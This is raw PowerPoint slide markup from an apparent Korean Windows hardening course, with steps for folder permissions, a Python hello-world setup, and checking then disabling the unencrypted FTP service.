                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AE5B850-677E-48CC-BB9A-A4191A86E0A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="927299" y="1122463"/>
            <a:ext cx="4546437" cy="5263950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0109F60-FEFA-4B80-922D-2195942B4212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6816271" y="761998"/>
            <a:ext cx="4221480" cy="5334000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302095626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“추가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(D)..."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6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>“선택할 개체 이름을 입력하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>예제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)(E)."</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>'Everyone' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 후 ”이름 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(C)" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버튼 클릭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“</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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2F8D28-409B-46E8-86BE-F0D9031C63DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933568" y="714746"/>
            <a:ext cx="4533900" cy="5715000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA4E0BB-8A59-45A8-A3B5-B5D65C597463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574697" y="966214"/>
            <a:ext cx="5019040" cy="4925568"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35416723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 “모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>권한”에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 대해 “허용” 클릭 후 “확인” 버튼 클릭</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572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9.  "navy06 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>속성“ 다이얼로그에서 ”확인“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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C582FD6-4019-4587-B985-28F69B0075E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933568" y="754603"/>
            <a:ext cx="4533900" cy="5745480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40FCD5B-51C9-4B01-984B-0C89AC962054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="956007"/>
            <a:ext cx="5616792" cy="5544076"/>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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37944725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빈 폴더에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 만든다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밑의 내용을 따라서 입력한 후 저장</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윈도우 탐색기의 주소창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라고 입력한 후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>커맨드 창을 킨다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python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 저장 되어 있는 주소를 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>밑 탐색기 주소창을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ctrl c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>하면 주소가 복사된다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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령 프롬프트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력하고 마우스 오른쪽 키를 누르면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>방금 주소가 복사된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>최종 입력은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>빈폴더</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>%” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“python python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.py” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“helloworld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 가 정상적으로 출력되었으면 환경설치 완료</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="그룹 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{881F4ED7-CAD2-4499-A8FB-4AA2465C9608}"/>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2BE758B-008B-4C5E-9D33-65274DE5779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E9907E9-F1F7-4CDA-9074-A4D81073DB9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D22FEDFB-D5DD-43FB-B842-FDED15F7E4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그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1981BE-DA05-40EC-9636-586CE44749FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="392120" y="671720"/>
            <a:ext cx="5485702" cy="252216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB0FDE9-38A6-4E49-BBB3-2CE7F6561D43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477481" y="1519558"/>
            <a:ext cx="5314980" cy="1257916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0009E799-BCA1-445E-8E39-7DA60C51DAFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="50000" t="95873" r="39571" b="85"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477481" y="3253243"/>
            <a:ext cx="3886533" cy="453223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EEDAA4F-9430-4216-B6E3-8DCC8C43685C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="56283" t="17782" r="31193" b="73857"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477481" y="5317986"/>
            <a:ext cx="4320730" cy="868294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{102702D9-44FD-4BB5-A4C3-FA67AABA4FFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect t="-489" r="1233" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477481" y="3741726"/>
            <a:ext cx="5249433" cy="753636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD2411D-A392-4F02-BCDA-8984C6AD3AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6337074" y="849726"/>
            <a:ext cx="5358429" cy="994978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7168771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/Training/Unit/Sys/7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>서비스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서비스는 계정과 패스워드가 암호화 되지 않은 채로 전송되므로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간단한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>sniffer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의해서도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스니핑이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가능합니다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따라서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제한하는 것이 중요합니다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현재 구동 중에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중지시키시고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시작유형을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사용안함</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설정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할수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371C9A88-E79F-4DAA-ADEA-5D4AE3948386}"/>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3E9F49D-B5A0-4913-A9E1-58762B3021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C163DCB-62AB-4BCD-8F53-169EC6AE2C1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AAE4DDD-DB29-48BD-9D77-C6C12C8ADD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888227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(FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>+ R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>키를 동시에 눌러 실행 다이얼로그 팝업 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</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로컬 호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 시도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>C:\User\Administrator&gt;ftp localhost</a:t>
            </a:r>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r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 가능함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"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3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Ctrl + C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비활성화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제어판” 실행</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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D111442F-4DA1-43BE-9B32-017E9929EC3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="644071" y="776816"/>
            <a:ext cx="4991100" cy="3119374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11CA48AF-33C9-4521-AE65-F721A5F7C939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009831" y="4553880"/>
            <a:ext cx="4259580" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
